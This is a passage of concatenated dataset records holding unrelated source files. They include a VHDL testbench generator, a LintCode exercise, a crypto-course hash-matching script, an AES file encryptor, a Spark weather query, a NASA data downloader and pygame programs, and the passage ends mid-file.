dp.ec2_point_to_vhdl_string(R) + \"); -- R\" )\n\n def __init__(self, dp, entity):\n TB_aluEC_prime_ext.__init__(self, dp, entity)\n # Build port\n self.add_port( \"ecP: in ec2_point\" )\n self.add_port( \"n: in std_logic_vector(c_P'range)\" )\n self.add_port( \"ecR: out ec2_point\" )\n # Build signal\n self.add_signal( \"signal ecP_sti: ec2_point := EC2_POINT_I\" )\n self.add_signal( \"signal n_sti: std_logic_vector(c_P'range) := (others =>'0')\" )\n self.add_signal( \"signal ecR_obs: ec2_point := EC2_POINT_I\" )\n # Build port map\n self.add_port_map( \"ecP => ecP_sti\" )\n self.add_port_map( \"n => n_sti\" )\n self.add_port_map( \"ecR => ecR_obs\" )\n # Build signal driving\n self.add_drive( \"ecP_sti <= ecP;\" )\n self.add_drive( \"n_sti <= n;\" )\n # Build function parameters\n self.add_func_param( \"ecP : ec2_point\" )\n self.add_func_param( \"n: std_logic_vector(c_P'range)\" )\n self.add_func_param( \"ecR : ec2_point\" )\n # Build compare\n self.add_compare( \"if (ecR_obs.ii /= ecR.ii or (ecR.ii = '0' and (ecR_obs.x /= ecR.x or ecR_obs.y /= ecR.y ))) then\" )\n self.add_compare( \" logger.log_error( LF &\" )\n self.add_compare( \" \\\"Error: transaction number \\\" & integer'image(op_count) & \\\" on\\\" & \\\"
\\\" & LF &\" )\n self.add_compare( \" \\\"P : \\\" & to_string(ecP_sti) & \\\"
\\\" & LF &\" )\n self.add_compare( \" \\\"n : \\\" & to_string(n_sti) & \\\"
\\\" & LF &\" )\n self.add_compare( \" \\\"yield : \\\" & to_string(ecR_obs) & \\\"
\\\" & LF &\" )\n self.add_compare( \" \\\"should be: \\\" & to_string(ecR) & \\\"
\\\" & LF &\" )\n self.add_compare( \" \\\"took \\\" & integer'image(cycle) & \\\" cycles\\\"\")\n self.add_compare( \" );\" )\n self.add_compare( \"else\" )\n self.add_compare( \" logger.log_note( LF &\" )\n self.add_compare( \" \\\"Transaction number \\\" & integer'image(op_count) & \\\" on\\\" & \\\"
\\\" & LF &\" )\n self.add_compare( \" \\\"P : \\\" & to_string(ecP_sti) & \\\"
\\\" & LF &\" )\n self.add_compare( \" \\\"n : \\\" & to_string(n_sti) & \\\"
\\\" & LF &\" )\n self.add_compare( \" \\\"yield : \\\" & to_string(ecR_obs) & \\\"
\\\" & LF &\" )\n self.add_compare( \" \\\"took \\\" & integer'image(cycle) & \\\" cycles\\\"\" )\n self.add_compare( \" );\" )\n self.add_compare( \"end if;\" )\n\n op_count = 10\n self.add_action( \"-- Testbench actions\" )\n self.add_action( \"\" )\n\n self.add_action( \"-- Directed tests\" )\n\n # Multiplication by 0\n P = dp.E2.random_element()\n n = Integer(dp.Fp(0))\n R = n * P\n self.add_point_multiplication(dp, P, n, R)\n self.add_action( \"\" )\n\n # Multiplication of point at infinity\n P = dp.E2(0,1,0)\n n = randrange(2**(dp.p.nbits())-1)\n R = n * P\n self.add_point_multiplication(dp, P, n, R)\n self.add_action( \"\" )\n\n self.add_action( \"-- Random tests\" )\n self.add_action( \"-- \" + str(op_count) + \" multiplication of random point (\" + str(dp.p.nbits()) + \" bits elements)\" )\n for i in range(op_count):\n P = dp.E2.random_element()\n n = randrange(2**(dp.p.nbits())-1)\n R = n * P\n self.add_point_multiplication(dp, P, n, R)\n\nclass Epm_point_multiplier(Entity):\n def __init__(self, dp):\n self.id = \"ec/efpm_point_multiplier\"\n self.src = [ \"efpm_point_multiplier.vhd\" ]\n self.dep = [ \"ec/efpm_point_adder_doubler\" ]\n\n def is_compatible_with(self, dp):\n if hasattr(dp, 'E2'):\n return True\n else:\n return False\n\n def get_default_tb(self, dp):\n return TestBench_efpm_point_multiplier(dp, self)\n\nobj = Epm_point_multiplier(dp)","sub_path":"entities/ec/efpm_point_multiplier/efpm_point_multiplier.py","file_name":"efpm_point_multiplier.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5389561","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n给定一个排序数组和一个目标值,如果在数组中找到目标值则返回索引。如果没有,返回到它将会被按顺序插入的位置。\n\n你可以假设在数组中无重复元素。\n\n\n样例\n[1,3,5,6],5 → 2\n\n[1,3,5,6],2 → 1\n\n[1,3,5,6], 7 → 4\n\n[1,3,5,6],0 → 0\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n @param A : a list of integers\n @param target : an integer to be inserted\n @return : an integer\n \"\"\"\n\n def searchInsert(self, A, target):\n # write your code here\n\n if target > A[len(A)-1]:\n return len(A) + 1\n for i in range(len(A)):\n if A[i] == target:\n return i\n if target > A[i] and target < A[i + 1]:\n return i + 1\n return 0\n\n\ns = Solution()\nresult = s.searchInsert([1, 2, 3, 4], 3)\nresult2 = s.searchInsert([1, 10, 1001, 201, 1001, 10001, 10007], 10008)\nprint(result)\nprint(result2)\n","sub_path":"lintcode/search-insert-position.py","file_name":"search-insert-position.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"607319121","text":"import re\nimport csv\nwith open(\"/Users/varru/Documents/Python Scripts/faculty.csv\") as filename:\n reader= csv.reader(filename, delimiter=',')\n x_name=[]\n x_degree=[]\n x_title=[]\n x_email=[]\n for row in reader:\n x_name.append(row[0])\n x_degree.append(row[1])\n x_title.append(row[2])\n x_email.append(row[3])\n\n\nemail=[]\nfor idx, word in enumerate(x_email[1:]):\n e=(word).strip()\n email.append(e)\n el=(re.search(\"([\\w.]+)@([\\w.]+)\",e))\n email.append(el.group())\ndomain=[]\nfor idx, word in enumerate(x_email[1:]):\n dm=word.strip()\n #email.append(e)\n dmn=(re.search(\"@([\\w.]+)\",dm))\n domain.append(dmn.group(1))\nUnique_domain=set(domain)\nprint(Unique_domain)\nprint(\" Number of Unique Email domains {}\".format(len(Unique_domain)))\n\nwith open(\"emails.csv\",'w') as file:\n em=csv.writer(file,delimiter='\\n',dialect='excel')\n em.writerow(email)\n\n","sub_path":"python/advanced_python_csv.py","file_name":"advanced_python_csv.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"317588797","text":"#Merkle decode python script\n\nimport crypto_tools as crypto\nimport hashlib\n\nword = \"merkle\"\nlength = 10\nhash_list = \"c:/Users/tommy/OneDrive/Documents/crypto1/merkle_list.txt\"\ns256_hash = \"0449f93d9bb16b9657d7c6350ec77d7f577d276743b714af0272c503a2eb01cc\"\n\n#Opens the file of hashes and salts. Returns an array [[salt, hash]]\ndef openHashFile(file):\n\tret_list = []\n\twith open(file, \"r\") as f:\n\t\tfor line in f:\n\t\t\tthis_item = []\n\t\t\tsalt_pos = line.find(\"salt:\") + 5\n\t\t\tthis_item.append(line[salt_pos:salt_pos + 20])\n\t\t\thash_pos = line.find(\"hash:\") + 5\n\t\t\tthis_item.append(line[hash_pos:hash_pos + 40])\n\t\t\t\n\t\t\tret_list.append(this_item)\n\t\n\treturn ret_list\n\t\nctools = crypto.crypto_tools()\n\nmerkle_list = ctools.merkleKeys(word, length)\n\nhash_list = openHashFile(hash_list)\n\n#Build the full list of merkle + hash\nfull_list = []\nfor i in merkle_list:\n\tfor j in hash_list:\n\t\tfull_list.append(\"COMP3441{\" + str(i) + \":\" + str(j[0]) + \"}\")\n\t\t\n#Look for a hash matching the sha256 hash\nprint(\"Checking for SHA256 hash match...\")\ncounter = 0\nfor i in range(0, len(full_list)):\n\ts256_result = hashlib.sha256(full_list[i].encode('utf-8')).hexdigest()\n\tif s256_result == s256_hash:\n\t\tprint(\"* Found a match at #\" + str(i) + \" with \" + full_list[i])\n\n\tprint(s256_result)","sub_path":"merkle_decode.py","file_name":"merkle_decode.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"20229505","text":"###############################################################################\n#\n# encrypts the provided input file (AES-128 + CMAC checksum)\n#\n# arg 1: encryption key 32byte string (first 16Bytes is aesDataKey second 16Bytes is aesCmacKey)\n# arg 2: target storage address - the address where the output file will stored\n# arg 3: input file\n# arg 4: output file\n#\n###############################################################################\n\nimport sys\nimport os\nimport struct\nimport hashlib\nfrom Crypto.Cipher import AES\nfrom Crypto.Hash import CMAC\n\n###############################################################################\ndef getFileHeader(fileSize, sectorSize):\n data = b'';\n data += struct.pack(\" 0:\n if remainingRd > plainBinFileReadBlockSize:\n rdLen = plainBinFileReadBlockSize\n else:\n rdLen = remainingRd\n\n inputFileChunk = inputFile.read(rdLen)\n remainingRd -= rdLen\n\n if rdLen < plainBinFileReadBlockSize:\n inputFileChunk = paddingSet(inputFileChunk, plainBinFileReadBlockSize - rdLen, b'\\x00')\n\n aesIv = getIv(storageSector)\n encryptedInputFileChunk = aesEncript(inputFileChunk, aesDataKey, aesIv)\n outputFileChunk = encryptedInputFileChunk + checksumGet(aesCmacKey, aesIv, encryptedInputFileChunk)\n outputFile.write(outputFileChunk)\n storageSector += 1\n\noutputFile.close()\ninputFile.close()\n\nprint('file encryption DONE!')\n","sub_path":"Tools/scripts/python/cipherStorageData.py","file_name":"cipherStorageData.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"511412465","text":"import os\nimport tensorflow as tf\nimport numpy as np\n\nFILE_PATH_PREFIX = \"data\"\nSRC_TRAIN = \"src-train.txt\"\nTRGT_TRAIN = \"tgt-train.txt\"\nTRAIN_FILES = [SRC_TRAIN, TRGT_TRAIN]\nSRC_VAL = \"src-val.txt\"\nTRGT_VAL = \"tgt-val.txt\"\nVAL_FILES = [SRC_VAL, TRGT_VAL]\n\nDATA_NPZ_NAME = \"data.npz\"\n\n\ndef main():\n \"\"\"\n Trains the transformer and then translates a single sentence..\n :return: None\n \"\"\"\n train_src = read_file(SRC_TRAIN)\n train_tgt = read_file(TRGT_TRAIN)\n val_src = read_file(SRC_VAL)\n val_tgt = read_file(TRGT_VAL)\n # val = read_files(VAL_FILES)\n np.savez(\n DATA_NPZ_NAME, train_src=train_src, train_tgt=train_tgt, val_src=val_src, val_tgt=val_tgt)\n\n\ndef read_file(file_name):\n with open(os.path.join(FILE_PATH_PREFIX, file_name), \"r\") as file:\n return file.readlines()\n\n\n# def read_files(file_names):\n# texts = []\n# for file_name in file_names:\n# texts.append(read_file(file_name))\n# src_and_text = np.array(\n# [(line_src, line_trgt) for line_src, line_trgt in zip(texts[0], texts[1])])\n# return src_and_text\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"text_to_npz.py","file_name":"text_to_npz.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"46905705","text":"import unittest\n\nfrom checkov.terraform.checks.resource.aws.S3BlockPublicACLs import scanner\nfrom checkov.common.models.enums import CheckResult\n\n\nclass TestS3BlockPublicACLs(unittest.TestCase):\n\n def test_failure(self):\n resource_conf = {'bucket':['foo'],\n 'block_public_acls': [False],\n 'block_public_policy': [True],\n 'ignore_public_acls': [True],\n 'restrict_public_buckets': [True]}\n scan_result = scanner.scan_resource_conf(conf=resource_conf)\n self.assertEqual(CheckResult.FAILED, scan_result)\n\n def test_success(self):\n resource_conf = {'bucket':['foo'],\n 'block_public_acls': [True],\n 'block_public_policy': [True],\n 'ignore_public_acls': [True],\n 'restrict_public_buckets': [True]}\n\n scan_result = scanner.scan_resource_conf(conf=resource_conf)\n self.assertEqual(CheckResult.PASSED, scan_result)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/terraform/checks/resource/aws/test_S3BlockPublicACLs.py","file_name":"test_S3BlockPublicACLs.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"545971994","text":"from urllib.error import HTTPError\n\nimport urbandict\n\nfrom gaganrobot import gaganrobot, Message\n\n\n@gaganrobot.on_cmd(\"ud\", about={\n 'header': \"Searches Urban Dictionary for the query\",\n 'flags': {'-l': \"limit : defaults to 1\"},\n 'usage': \"{tr}ud [flag] [query]\",\n 'examples': [\"{tr}ud gaganrobot\", \"{tr}ud -l3 gaganrobot\"]})\nasync def urban_dict(message: Message):\n await message.edit(\"Processing...\")\n query = message.filtered_input_str\n if not query:\n await message.err(\"No found any query!\")\n return\n try:\n mean = urbandict.define(query)\n except HTTPError:\n await message.edit(f\"Sorry, couldn't find any results for: `{query}`\", del_in=5)\n return\n output = ''\n limit = int(message.flags.get('-l', 1))\n for i, mean_ in enumerate(mean, start=1):\n output += f\"{i}. **{mean_['def']}**\\n\" + \\\n f\" Examples:\\n * `{mean_['example'] or 'not found'}`\\n\\n\"\n if limit <= i:\n break\n if not output:\n await message.edit(f\"No result found for **{query}**\", del_in=5)\n return\n output = f\"**Query:** `{query}`\\n**Limit:** `{limit}`\\n\\n{output}\"\n await message.edit_or_send_as_file(text=output, caption=query)\n","sub_path":"gaganrobot/plugins/utils/ud.py","file_name":"ud.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460219101","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available.\nCopyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.\nLicensed under the MIT License (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at\nhttp://opensource.org/licenses/MIT\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\"\"\" # noqa\n\"\"\"\n@summary: 任务流程实例views\n\"\"\"\nfrom common.mymako import render_mako_context\n\n\ndef home(request, biz_cc_id):\n \"\"\"\n @summary: 任务记录首页\n @param request:\n @param biz_cc_id:\n @return:\n \"\"\"\n ctx = {\n \"view_mode\": \"app\",\n \"app_id\": \"\",\n \"template_id\": request.GET.get('template_id', ''),\n }\n return render_mako_context(request, '/core/base_vue.html', ctx)\n","sub_path":"gcloud/taskflow3/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"617063982","text":"#!/usr/bin/python\nclass motor(object):\n\tdef __init__(self, pin, kv=750, WMin=0, WMax=100):\n\t\tself.powered = False\n\t\tself.__pin = pin\n\t\tself.__kv = kv\n\t\tself.setWLimits(WMin, WMax)\n\t\tself.__W = self.__WMin\n\t\tself.__Wh = 10\n\t\t\n\t\ttry:\n\t\t\tfrom RPIO import PWM\n\t\t\tself.__IO = PWM.Servo()\n\t\texcept ImportError:\n\t\t\tself.simulation = True\n\n\tdef setWLimits(self, WMin, WMax):\n\t\tif WMin < 0:\n\t\t\tWMin = 0\n\t\tself.__WMin = WMin\n\t\tif WMax > 100:\n\t\t\tWMax = 100\n\t\tself.__WMax = WMax\n\n\tdef start(self):\n\t\ttry:\n\t\t\tfrom RPIO import PWM\n\t\t\tself.__IO = PWM.Servo()\n\t\t\tself.powered = True\n\t\texcept ImportError:\n\t\t\tself.simulation = True\n\t\t\tself.powered = False\n\n\tdef stop(self):\n\t\tself.setW(0)\n\t\tif self.powered:\n\t\t\tself.__IO.stop_servo(self.__pin)\n\t\t\tself.powered = False\n\n\tdef increaseW(self, step=1):\n\t\tself.__W = self.__W + step\n\t\tself.setW(self.__W)\n\n\tdef decreaseW(self, step=1):\n\t\tself.__W = self.__W - step\n\t\tself.setW(self.__W)\n\n\tdef getW(self):\n\t\treturn self.__W\n\n\tdef setW(self, W):\n\t\tPW = 0\n\t\tself.__W = W\n\t\tif self.__W < self.__WMin:\n\t\t\tself.__W = self.__WMin\n\t\tif self.__W > self.__WMax:\n\t\t\tself.__W = self.__WMax\n\t\tPW = (1000 + (self.__W) * 10)\n\t\tif self.powered:\n\t\t\tself.__IO.set_servo(self.__pin, PW)","sub_path":"nodeServer/python/motor.py","file_name":"motor.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"349561836","text":"import pygame\nfrom player import Player\nfrom game import Game\nwidth = 600\nheight = 600\nwin = pygame.display.set_mode((width, height))\nchessBoard = pygame.image.load('images/chessBoard.png')\npygame.display.set_caption(\"Client\")\n\n\ndef redrawWindow(win):\n win.fill((102,102,102))\n win.blit(chessBoard, (0,0))\n for p in players:\n p.draw(win)\n for p2 in players2:\n p2.draw(win)\n pygame.display.update()\n\n\n\"\"\"This initializes pieces on board\"\"\"\n\n\nplayers = [Player(i*50, 50, 50, 50, 'pw') for i in range(8)]\nking = Player(150, 0, 50, 50, 'kw')\nqueen = Player(200, 0, 50, 50, 'qw')\nrook = [Player(0, 0, 50, 50, 'rw'), Player(350, 0, 50, 50, 'rw')]\nbishop = [Player(100, 0, 50, 50, 'bw'), Player(250,0,50,50, 'bw')]\nknight = [Player(50, 0, 50, 50, 'nw'), Player(300,0,50,50, 'nw')]\nplayers.append(king)\nplayers.append(queen)\nplayers.extend(rook)\nplayers.extend(bishop)\nplayers.extend(knight)\n\nplayers2 = [Player(i*50, 300, 50, 50, 'p') for i in range(8)]\nking2 = Player(150, 350, 50, 50, 'k')\nqueen2 = Player(200, 350, 50, 50, 'q')\nrook2 = [Player(0, 350, 50, 50, 'r'), Player(350, 350, 50, 50, 'r')]\nbishop2 = [Player(100, 350, 50, 50, 'b'), Player(250,350,50,50, 'b')]\nknight2 = [Player(50, 350, 50, 50, 'n'), Player(300,350,50,50, 'n')]\nplayers2.append(king2)\nplayers2.append(queen2)\nplayers2.extend(rook2)\nplayers2.extend(bishop2)\nplayers2.extend(knight2)\n\nclickCount = 0\n\n\ndef main():\n pygame.init()\n\n g = Game(players[0])\n\n clock = pygame.time.Clock()\n\n while True:\n clock.tick(60)\n if 0 <= g.turnCount < 1:\n g.check_events(players, players2)\n\n elif 1 <= g.turnCount < 2:\n g.check_events(players2, players)\n\n else:\n g.turnCount = 0\n\n redrawWindow(win)\n\nmain()","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"252459206","text":"\"\"\"Config singleton class.\n\nIt is defined as a singleton, so it can be easily accessed\nin every application layer.\n\"\"\"\n\nimport os\nimport pycfgr\n# Wikiminer\nfrom wikiminer.meta import Singleton\n\n\nclass Config(pycfgr.Config, metaclass=Singleton):\n \"\"\"Config singleton class.\"\"\"\n\n def __init__(self, config='config.yml', **kwargs):\n \"\"\"Initialization method.\"\"\"\n super().__init__(config=config, **kwargs)\n root_path = self._get_root_path(config)\n self.apply(\n dct=self,\n fields='filename',\n func=lambda x: self._make_dirpath(os.path.join(root_path, x)),\n recursive=True,\n inplace=True\n )\n\n def _get_root_path(self, anchor, path=None):\n \"\"\"Get root path using anchor filename.\"\"\"\n if not path:\n path = os.getcwd()\n files = os.listdir(path)\n if anchor in files:\n return path\n elif path != '/':\n path = os.path.split(path)[0]\n return self._get_root_path(anchor, path)\n else:\n raise RuntimeError(\"Anchor `{}` could not be found.\".format(anchor))\n\n def _make_dirpath(self, path):\n \"\"\"Make dirpath.\"\"\"\n path = os.path.realpath(path)\n if not os.path.exists(path):\n dirpath = os.path.dirname(path)\n os.makedirs(dirpath, exist_ok=True)\n return path\n\n def apply(self, dct, fields, func, recursive=False, inplace=False, **kwargs):\n \"\"\"Apply function to list of fields.\n\n Parameters\n ----------\n dct : dict\n Dictionary-like object to modify.\n fields : str or list\n Field name or list of field names.\n func : func\n Funtion to be applied to fields.\n recursive : bool\n Should apply be recursive.\n inplace : bool\n Should inplace modification be used.\n **kwargs :\n Other arguments passed to the function being applied.\n \"\"\"\n if not inplace:\n dct = dct.copy()\n kwfunc = lambda x: func(x, **kwargs)\n if not isinstance(fields, (list, tuple)):\n fields = [ fields ]\n for k, v in dct.items():\n if k in fields:\n dct[k] = kwfunc(v)\n if recursive and isinstance(dct[k], dict):\n dct[k] = self.apply(dct[k], fields, func, recursive, **kwargs)\n if not inplace:\n return dct\n","sub_path":"wikiminer/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"198841373","text":"import vtk\n\nclass House:\n\n def SetSphere(self,radio): \n self.chapa = vtk.vtkSphereSource()\n self.chapa.SetRadius(radio)\n self.chapa.Update()\n #mapper\n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputData(self.chapa.GetOutput())\n return mapper\n \n def SetCone(self,radio,height,resolution):\n self.cone = vtk.vtkConeSource()\n self.cone.SetRadius(radio)\n self.cone.SetHeight(height)\n self.cone.SetResolution(resolution)\n self.cone.SetDirection(0,1,0)\n self.cone.Update()\n #mapper\n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputData(self.cone.GetOutput())\n return mapper\n\n def SetCube(self,x,y,z):\n self.cube = vtk.vtkCubeSource()\n self.cube.SetXLength(x)\n self.cube.SetYLength(y)\n self.cube.SetZLength(z)\n self.cube.Update()\n #mapper\n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputData(self.cube.GetOutput())\n return mapper\n\n def SetActorCube(self,mapperCube,r,g,b,posX,posY,posZ):\n actor = vtk.vtkActor()\n actor.SetMapper(mapperCube)\n actor.GetProperty().SetColor( r,g,b,)\n actor.SetPosition(posX,posY,posZ)\n return actor\n \n def SetActorSphere(self,mapperSphere,r,g,b,posX,posY,posZ):\n actor = vtk.vtkActor()\n actor.SetMapper(mapperSphere)\n actor.GetProperty().SetColor(r,g,b)\n actor.SetPosition(posX,posY,posZ)\n return actor\n def SetActorCone(self,mapperCone,r,g,b,posX,posY,posZ):\n actor = vtk.vtkActor()\n actor.SetMapper(mapperCone)\n actor.GetProperty().SetColor(r,g,b)\n actor.SetPosition(posX,posY,posZ)\n return actor\n\n\n\n","sub_path":"parcial_1/Lab_1/project/house.py","file_name":"house.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"169740012","text":"from pyspark import SparkContext, SparkConf\nfrom pyspark.sql import SparkSession\n\n\ndef reduceUnifiedDisaster(a,b):\n return [ (a[0] + b[0])*1000000, (a[1] + b[1])*1000, a[2] + b[2]]\n \nif __name__ == \"__main__\":\n\n spark = SparkSession \\\n .builder \\\n .appName(\"weater_app\") \\\n .config(\"spark.some.config.option\", \"some-value\") \\\n .getOrCreate()\n\n df = spark.read \\\n .option(\"header\", \"true\") \\\n .csv(\"hdfs://namenode:8020/weather/Stormdata_2013_red.csv\")\n df.createOrReplaceTempView(\"weather_data\")\n \n\n df = spark.read \\\n .option(\"header\", \"true\") \\\n .csv(\"hdfs://namenode:8020/weather/results/disaster_type_count_by_month.csv\")\n df.createOrReplaceTempView(\"disaste_type_month\")\n\n# Upiti gde se steta meri u milionima\n query = \"\"\" SELECT STATE,MONTH_NAME, EVENT_TYPE FROM weather_data wd\n WHERE NOT EXISTS \n (SELECT MONTH_NAME, STATE,EVENT_TYPE\n FROM disaste_type_month dtm\n WHERE wd.MONTH_NAME = dtm.MONTH_NAME AND wd.STATE = dtm.STATE AND wd.EVENT_TYPE = dtm.EVENT_TYPE)\n GROUP BY MONTH_NAME, STATE,EVENT_TYPE\n ORDER BY STATE ASC \"\"\"\n df_upit = spark.sql(query) \n df_upit.show(100)\n df_upit.repartition(1).write.mode('overwrite').csv('hdfs://namenode:8020/weather/results/unusual_disasters_2013')","sub_path":"pr2.py","file_name":"pr2.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"502827672","text":"import yaml\nimport logging\n\nfrom datetime import datetime, timedelta\nfrom multiprocessing import Pool\n\nfrom hatfieldcmr.ingest import LocalStorageWrapper\nfrom hatfieldcmr import CMRClient\n\nimport admin.constants as const\n\nlogger = logging.getLogger(__name__)\n\ndef download_granules(envpath: str, date: str, sat: str, days: int = 5):\n \"\"\"Download MODIS/VIIRS granules for a given day\n\n Parameters\n ----------\n envpath : str\n [description]\n sat : str\n [description]\n \"\"\"\n #load_dotenv(envpath)\n envvars = open(envpath ,'r')\n secrets = yaml.load(envvars, Loader=yaml.FullLoader)\n envvars.close()\n \n if sat == 'modis':\n product = {\n 'name': 'daily',\n 'products': ['MOD10A1.6'],\n 'date_span': int(days)-1\n }\n elif sat == 'viirs':\n product = {\n 'name': 'daily',\n 'products': ['VNP10A1F.1'],\n 'date_span': int(days)-1\n }\n else:\n pass\n\n date = date.split('.')\n end_date = datetime(int(date[0]), int(date[1]), int(date[2]))\n storage_wrapper = LocalStorageWrapper(\n const.TOP\n )\n\n ed_client = CMRClient(storage_wrapper, earthdata_user=secrets['EARTHDATA_USER'], earthdata_pass=secrets['EARTHDATA_PASS'])\n start_date = end_date - timedelta(product['date_span'])\n granules = ed_client.query(\n str(start_date.date()),\n str(end_date.date()),\n product,\n bbox=[*const.BBOX]\n )\n print(f\"queried product {product}, got {len(granules)} granules, downloading\")\n try:\n with Pool(4) as p:\n p.map(ed_client.download_granule, granules)\n except KeyboardInterrupt:\n print('Exiting download pool')\n","sub_path":"download_granules/download_granules.py","file_name":"download_granules.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"73611303","text":"\r\n# Libraries\r\nimport pygame\r\nimport time\r\n\r\n# Engine\r\nfrom lecture_versions.engine.game import Game\r\n\r\n# Constants\r\nfrom pygame.constants import *\r\nfrom lecture_versions.engine.constants import *\r\n\r\n# Components\r\nfrom lecture_versions.v3.player import Player\r\nfrom lecture_versions.v3.enemy import Enemy\r\nfrom lecture_versions.v3.barrier import Barrier\r\n\r\n\r\ndef update(timedelta):\r\n # Only the moving objects have to be updated\r\n Enemy.update_all(timedelta)\r\n Player.update_all(timedelta)\r\n\r\n\r\ndef draw(game, player_1, player_2):\r\n\r\n # 1. Draw game elements\r\n game.draw_background()\r\n Barrier.draw_all(game)\r\n Enemy.draw_all(game)\r\n Player.draw_all(game)\r\n\r\n # 2. Draw text in top left corner\r\n if DRAW_HELPERS:\r\n game.draw_text(text=f\"collisions: {player_1.collisions}\",\r\n x_left=5, y_top=5, font_size=20, color=player_1.color)\r\n game.draw_text(text=f\"position: {player_1.position}, velocity: {player_1.velocity}\",\r\n x_left=5, y_top=30, font_size=20, color=player_1.color)\r\n fps_y_top = 55\r\n else:\r\n fps_y_top = 5\r\n\r\n game.draw_text(text=f\"{game.fps * SIMULATION_FRAMES_PER_DRAW} FPS (simulation) \"\r\n f\"{game.fps} FPS (canvas)\", x_left=5, y_top=fps_y_top, font_size=20)\r\n\r\n # 3. Update game window (and fps)\r\n game.update()\r\n\r\n\r\ndef run():\r\n\r\n # 1. Initialize game\r\n game = Game(\r\n width=50 * SCALING_FACTOR,\r\n height=20 * SCALING_FACTOR,\r\n print_fps=False, max_fps=MAX_DRAW_FPS\r\n )\r\n\r\n # 2. Initialize players\r\n player_1 = Player(\r\n \"Max\", color=(200, 0, 50), position=(21.5, 12),\r\n keymap={K_w: 'UP', K_a: 'LEFT', K_s: 'DOWN', K_d: 'RIGHT'}\r\n )\r\n player_2 = Player(\r\n \"Moritz\", color=(50, 0, 200), position=(14.5, 12),\r\n keymap={K_UP: 'UP', K_LEFT: 'LEFT', K_DOWN: 'DOWN', K_RIGHT: 'RIGHT'}\r\n )\r\n\r\n # 3. Initialize enemies\r\n for x in range(2, 32, 3):\r\n Enemy(position=(x, 2))\r\n pass\r\n\r\n # 4. Initialize barriers\r\n Barrier(x_left=-1, y_top=21, width=52, height=1) # window top\r\n Barrier(x_left=-1, y_top=1, width=52, height=1) # window bottom\r\n Barrier(x_left=-1, y_top=21, width=1, height=22) # window left\r\n Barrier(x_left=50, y_top=21, width=1, height=22) # window right\r\n\r\n Barrier(x_left=12, y_top=6, width=5, height=1) # step 1\r\n Barrier(x_left=19, y_top=8, width=5, height=1) # step 2\r\n Barrier(x_left=26, y_top=10, width=5, height=1) # step 3\r\n\r\n Barrier(x_left=36, y_top=9, width=2, height=8) # pyramid column 1\r\n Barrier(x_left=38, y_top=7, width=2, height=6) # pyramid column 2\r\n Barrier(x_left=40, y_top=5, width=2, height=4) # pyramid column 3\r\n Barrier(x_left=42, y_top=3, width=2, height=2) # pyramid column 4\r\n\r\n # After game_finish_time has been set from inside check_for_win\r\n # The game will continue to run for 6 seconds and then end\r\n while True:\r\n\r\n # 1. Attach event handler\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n game.exit()\r\n\r\n if event.type in (pygame.KEYDOWN, pygame.KEYUP):\r\n if event.key in (pygame.K_w, pygame.K_a, pygame.K_s, pygame.K_d):\r\n player_1.keypress(event.key, event.type == pygame.KEYDOWN)\r\n if event.key in (pygame.K_UP, pygame.K_LEFT, pygame.K_DOWN, pygame.K_RIGHT):\r\n player_2.keypress(event.key, event.type == pygame.KEYDOWN)\r\n\r\n # 2. Update (simulation)\r\n if not SLOWDOWN:\r\n # Collision detection is not fully working with very\r\n # low fps (<< 10 fps)\r\n fps = max(game.fps, MIN_DRAW_FPS)\r\n\r\n # Solution: Simulate multiple time steps per drawing\r\n # because drawing takes > 250 times longer 